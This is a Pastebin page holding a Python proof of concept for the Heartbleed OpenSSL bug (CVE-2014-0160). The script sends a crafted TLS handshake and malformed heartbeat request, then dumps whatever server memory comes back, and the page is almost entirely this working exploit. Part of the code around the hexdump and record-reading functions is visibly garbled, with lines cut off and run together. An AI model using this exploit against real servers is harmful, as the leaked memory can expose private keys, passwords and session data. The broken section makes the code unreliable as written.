SHARE
TWEET

SOURCE EXPLOIT - Heartbleed

Googleinurl May 6th, 2014 908 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  4. # The author disclaims copyright to this source code.
  5.  
  6. import sys
  7. import struct
  8. import socket
  9. import time
  10. import select
  11. import re
  12. from optparse import OptionParser
  13.  
  14. options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
  15. options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
  16.  
  17. def h2bin(x):
  18.     return x.replace(' ', '').replace('\n', '').decode('hex')
  19.  
  20. hello = h2bin('''
  21. 16 03 02 00  dc 01 00 00 d8 03 02 53
  22. 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
  23. bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
  24. 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
  25. 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
  26. c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
  27. c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
  28. c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
  29. c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
  30. 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
  31. 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
  32. 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
  33. 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
  34. 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
  35. 00 0f 00 01 01                                
  36. ''')
  37.  
  38. hb = h2bin('''
  39. 18 03 02 00 03
  40. 01 40 00
  41. ''')
  42.  
  43. def hexdump(s):
  44.     for b in xrange(0, len(s), 16):
  45.         lin = [c for c in s[b : b + 16]]
  46.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
  47.         pdat = ''.join((c if 32 <= ord(c)  0:
  48.         rtime = endtime - time.time()
  49.         if rtime BHH', hdr)
  50.    pay = recvall(s, ln, 10)
  51.    if pay is None:
  52.        print 'Unexpected EOF receiving record payload - server closed connection'
  53.        return None, None, None
  54.    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
  55.    return typ, ver, pay
  56.  
  57. def hit_hb(s):
  58.    s.send(hb)
  59.    while True:
  60.        typ, ver, pay = recvmsg(s)
  61.        if typ is None:
  62.            print 'No heartbeat response received, server likely not vulnerable'
  63.            return False
  64.  
  65.        if typ == 24:
  66.            print 'Received heartbeat response:'
  67.            hexdump(pay)
  68.            if len(pay) > 3:
  69.                print 'WARNING: server returned more data than it should - server is vulnerable!'
  70.            else:
  71.                print 'Server processed malformed heartbeat, but did not return any extra data.'
  72.            return True
  73.  
  74.        if typ == 21:
  75.            print 'Received alert:'
  76.            hexdump(pay)
  77.            print 'Server returned error, likely not vulnerable'
  78.            return False
  79.  
  80. def main():
  81.    opts, args = options.parse_args()
  82.    if len(args) < 1:
  83.        options.print_help()
  84.        return
  85.  
  86.    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  87.    print 'Connecting...'
  88.    sys.stdout.flush()
  89.    s.connect((args[0], opts.port))
  90.    print 'Sending Client Hello...'
  91.    sys.stdout.flush()
  92.    s.send(hello)
  93.    print 'Waiting for Server Hello...'
  94.    sys.stdout.flush()
  95.    while True:
  96.        typ, ver, pay = recvmsg(s)
  97.        if typ == None:
  98.            print 'Server closed connection without sending Server Hello.'
  99.            return
  100.        # Look for server hello done message.
  101.        if typ == 22 and ord(pay[0]) == 0x0E:
  102.            break
  103.  
  104.    print 'Sending heartbeat request...'
  105.    sys.stdout.flush()
  106.    s.send(hb)
  107.    hit_hb(s)
  108.  
  109. if __name__ == '__main__':
  110.    main()
  111.  
  112. # 392164AAAD9A3A12   1337day.com [2014-04-09]   F6385B09958196DD #
RAW Paste Data
Top